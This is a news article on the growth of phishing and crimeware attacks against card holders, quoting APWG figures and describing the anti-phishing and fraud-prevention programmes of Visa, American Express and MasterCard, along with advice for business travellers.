Card Cos. Combat Rising Tide Of E-Mail Phishing

The practice known as phishing—an e-mail scam in which hackers lure credit-card holders to fraudulent Web sites and steal account information—has more than doubled since late last year, while attempts at online identity theft using virus-like software applications is growing at an even more alarming rate.

In response, several payment firms have launched anti-phishing and fraud-prevention campaigns, in part to educate business travelers about the danger of phishing and the necessity of protecting corporate card numbers.

A total of 14,135 reports of phishing attacks were logged during the month of July by the Anti-Phishing Working Group. By comparison, the global Internet-fraud watchdog logged 6,957 reports in October 2004. The number of reported cases in July of identity theft attempts using phishing-based Trojan horse applications—known as crimeware—was 174, up from 79 in May.

"There has been a profound shift—and we thought it would happen at some point—since the end of last year," said Peter Cassidy, APWG secretary general. "We're seeing an emphasis on automated schemes. Most phishing attacks are based on social-engineering schemes, but more and more of these are automated systems, what we call crimeware, that seek to plant software on a user's machine to automatically retrieve the user's name and password or the user's credentials without the direct deception of the user."

Traditionally, Cassidy said, a victim of a phishing attack receives a fake e-mail designed to look as if it was from a legitimate financial institution or retailer. The e-mail directs the victim to a similarly real-looking Web site, where the victim is asked to provide account information, a password, social security number or other information.

A phishing attack using crimeware—known as a technical subterfuge scheme—involves a fake e-mail linking a victim to a Web site that, once rendered on the browser, will secretly execute a piece of JavaScript that will record every keystroke the victim makes, including the entry of passwords and other account data.

"We're seeing a lot more of that," Cassidy said. "The increase has been almost 100 percent."

There are several things computer users should do to protect themselves from falling prey to a phishing attack, including installing and using anti-virus, anti-spam and anti-spyware software.

That advice is particularly important to business travelers who use laptop computers while on the road. "I don't know how many times I've seen different tools that come with people's laptops and they've just never turned them on," Cassidy said. "Personal computing hygiene has never been more important. Now, instead of getting an annoying disruption to the service of your computer, you could be robbed of things that are very valuable to you."

If you cannot trust the authenticity of an e-mail you receive, then pick up the phone and call the organization that allegedly sent it, Cassidy said. "It does two things. It prevents you from doing something wrong and it alerts the financial institution or e-commerce trader. Worst-case scenario is they'll tell you, 'That's right. We did send that to you, and we'll read it over the phone. Is this what you got?' Always, when in doubt, make a phone call."

That advice is echoed by major credit card companies that provide detailed information about phishing and fraud prevention on their Web sites. Both Visa and American Express have e-mail addresses for customers to specifically report suspected phishing attacks.

"We approach phishing as a holistic effort that requires consumer education, internal controls, and partnership with law enforcement in order to effectively protect cardmembers," said Kim Forde, American Express public affairs director. "Consumer education is a critical component. It's important that cardmembers understand what phishing is, what to look for, how they can be victimized, and what to do if they suspect something."

Visa's use of its Web site and other means to educate cardholders about phishing have "helped lead to fewer reported incidences of successful attacks on cardholders," said Brad Nightengale, Visa USA vice president of channel management. "While phishers aren't going to stop trying, they are being forced to find other targets and change their targets."

"Visa takes phishing attacks very seriously and have worked aggressively with ISPs to get these sites shut down—often within three hours of detection," Nightengale said."Visa is focused not just on shutting down phishing sites, but preventing phishing e-mails from ever reaching cardholders."

In February, Visa teamed up with Microsoft and Ebay to launch the Phish Report Network, which seeks to collect and share information about phishing attacks. "Subscribers can access the database or receive real-time notifications of known phishing sites, enabling them to protect consumers by blocking those sites in user-facing security applications," Nightengale said.

"Working together, Visa and our member banks have taken a number of steps to anticipate, detect and shut down phishing threats in recent months," he said. "Visa is continually reviewing programs and processes to drive fraud rates lower throughout the payment system."

Similarly, American Express' Forde said, "We monitor the Internet for any potential phishing attempts, as well as for the improper use of AXP card numbers. This practice is not new to us—we have been monitoring the online space for quite some time and phishing is now one additional component we are looking for in this process. Our long-standing partnership with law enforcement allows us to act quickly to identify and help shut down fraudulent sites. We are constantly evolving these techniques to adapt to the changing activities of criminals."

Both Nightengale and Forde declined to offer specifics about fraud detection and prevention measures.

In June 2004, MasterCard International launched Operation Stop IT (identity theft), which works to identify phishing scams and other online fraud via continual monitoring of the Internet. Fraudulent e-mails and Web sites are reported in real time to MasterCard, which in turn informs law enforcement and the relevant ISP. The vast majority of fake Web sites identified by MasterCard have been taken offline within 24 to 48 hours of detection, the firm said.

Thus far, Operation Stop IT has led to the shutdown of more than 1,400 phishing Web sites and more than 700 sites brokering illegally obtained payments card numbers, the firm said.

"The numbers speak to the resounding success. With strong collaborative efforts in place, we are able to take the quick, decisive action that has been integral to our success," Tim Morris, MasterCard International vice president of security and risk management for Asia/Pacific, said in a statement. "Working in partnership with law enforcement, MasterCard continues to be vigilant and press on relentlessly to shut down fraudulent sites."

Several companies recently have fallen victim to a new variation of online fraud known as "spear phishing."

It "involves sending e-mail to employees of a company that is designed to appear as if it comes from an executive within that company," Nightengale said. "The perpetrators of this scheme are after corporate secrets such as passwords and other sensitive data.We have not received any specific reports of spear phishing being used to obtain corporate payment card information, but it is important for companies to make their employees aware of this scheme and to establish policies and procedures to avoid falling victim to it."

"It's an interesting sort of affinity scheme," said APWG's Cassidy."How do you say no to your CEO?"